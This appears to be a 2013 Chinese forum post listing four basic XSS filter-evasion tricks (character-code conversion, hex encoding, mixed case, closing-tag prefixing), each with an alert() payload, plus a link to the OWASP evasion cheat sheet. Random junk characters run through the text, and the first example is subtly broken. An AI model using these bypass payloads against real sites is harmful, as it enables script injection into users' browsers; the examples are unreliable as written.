四种超级基础的绕过方法。5 x7 y9 w; ^% @7 p
1.转换为ASCII码
0 i4 p6 y8 _3 @ r0 ~+ k例子:原脚本为<script>alert(‘I love F4ck’)</script >( ^3 D9 X0 W$ I
通过转换,变成:
& f) ~( m- C6 d0 ?) B1 A/ L" F/ u<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>1 O2 f, p, z) R! a- y. H/ ^
9 O+ g3 E& V9 o4 n2.转换为HEX(十六进制) v2 N7 O9 E" W1 L" ? p: w6 ~7 i: }' f
例子:原脚本为<script>alert(‘I love F4ck’)</script>
* @& b- L |9 J4 F% }: d; ?通过转换,变成:6 S" ^: m# }3 T$ g7 Q
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e$ G/ }" E* m* L/ b
e. U% E8 f& O# T
3.转换脚本的大小写* j5 r) u* Q1 A7 x9 n4 {" c4 T! K
例子:原脚本为<script>alert(‘I love F4ck’)</script>5 Q- V; R1 G; z, T e. T8 D
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
, S% z/ B) B$ ?% X . O. u) A. d9 B
4.增加闭合标记”>
+ ^4 M3 b% i- _5 G, w3 C例子:原脚本为<script>alert(‘I love F4ck’)</script>
2 l: S0 Y+ E; {% v4 l转换为:”><script>alert(‘I love F4ck’)</script>
4 ~: o0 L) ]1 ?6 T& s更详细绕过技术请参考此网页
( t* w8 ^) ?! Z) p0 q: n9 whttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
: b' T5 p. q6 w8 i1 A2 r* { 8 _. E% P4 C0 R; w3 b) B
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对